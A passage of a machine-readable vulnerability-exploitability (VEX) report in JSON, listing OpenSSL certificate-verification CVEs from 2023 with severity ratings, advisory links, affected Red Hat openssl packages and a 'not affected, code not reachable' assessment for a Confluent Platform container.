          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464"
        },
        {
          "url": "https://security.gentoo.org/glsa/202402-08"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230406-0006"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230406-0006/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240621-0006"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240621-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6039-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.couchbase.com/alerts"
        },
        {
          "url": "https://www.couchbase.com/alerts/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-0464"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5417"
        },
        {
          "url": "https://www.openssl.org/news/secadv/20230322.txt"
        }
      ],
      "published": "2023-03-22T17:15:13+00:00",
      "updated": "2026-06-17T05:25:36+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2023-0465",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        295
      ],
      "description": "Applications that use a non-default option when verifying certificates may be\nvulnerable to an attack from a malicious CA to circumvent certain checks.\n\nInvalid certificate policies in leaf certificates are silently ignored by\nOpenSSL and other certificate policy checks are skipped for that certificate.\nA malicious CA could use this to deliberately assert invalid certificate policies\nin order to circumvent policy checking on the certificate altogether.\n\nPolicy processing is disabled by default but can be enabled by passing\nthe `-policy' argument to the command line utilities or by calling the\n`X509_VERIFY_PARAM_set1_policies()' function.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-0465"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2023:3722"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-0465"
        },
        {
          "url": "https://bugzilla.redhat.com/2181082"
        },
        {
          "url": "https://bugzilla.redhat.com/2182561"
        },
        {
          "url": "https://bugzilla.redhat.com/2182565"
        },
        {
          "url": "https://bugzilla.redhat.com/2188461"
        },
        {
          "url": "https://bugzilla.redhat.com/2207947"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2023-3722.html"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c"
        },
        {
          "url": "https://github.com/advisories/GHSA-77f3-6546-6rj7"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-0465.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2023-3722.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465"
        },
        {
          "url": "https://security.gentoo.org/glsa/202402-08"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230414-0001"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230414-0001/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6039-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-0465"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5417"
        },
        {
          "url": "https://www.openssl.org/news/secadv/20230328.txt"
        }
      ],
      "published": "2023-03-28T15:15:06+00:00",
      "updated": "2026-06-17T05:25:36+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2023-0466",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        295
      ],
      "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to\nimplicitly enable the certificate policy check when doing certificate\nverification. However the implementation of the function does not\nenable the check which allows certificates with invalid or incorrect\npolicies to pass the certificate verification.\n\nAs suddenly enabling the policy check could break existing deployments it was\ndecided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy()\nfunction.\n\nInstead the applications that require OpenSSL to perform certificate\npolicy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly\nenable the policy check by calling X509_VERIFY_PARAM_set_flags() with\nthe X509_V_FLAG_POLICY_CHECK flag argument.\n\nCertificate policy checks are disabled by default in OpenSSL and are not\ncommonly used by applications.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-0466"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2023/09/28/4"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2023:3722"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-0466"
        },
        {
          "url": "https://bugzilla.redhat.com/2181082"
        },
        {
          "url": "https://bugzilla.redhat.com/2182561"
        },
        {
          "url": "https://bugzilla.redhat.com/2182565"
        },
        {
          "url": "https://bugzilla.redhat.com/2188461"
        },
        {
          "url": "https://bugzilla.redhat.com/2207947"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2023-3722.html"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061"
        },
        {
          "url": "https://github.com/advisories/GHSA-pxvj-4wx4-gv6w"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-0466.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2023-3722.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466"
        },
        {
          "url": "https://security.gentoo.org/glsa/202402-08"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230414-0001"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230414-0001/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6039-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-0466"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5417"
        },
        {
          "url": "https://www.openssl.org/news/secadv/20230328.txt"
        }
      ],
      "published": "2023-03-28T15:15:06+00:00",
      "updated": "2026-06-17T05:25:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
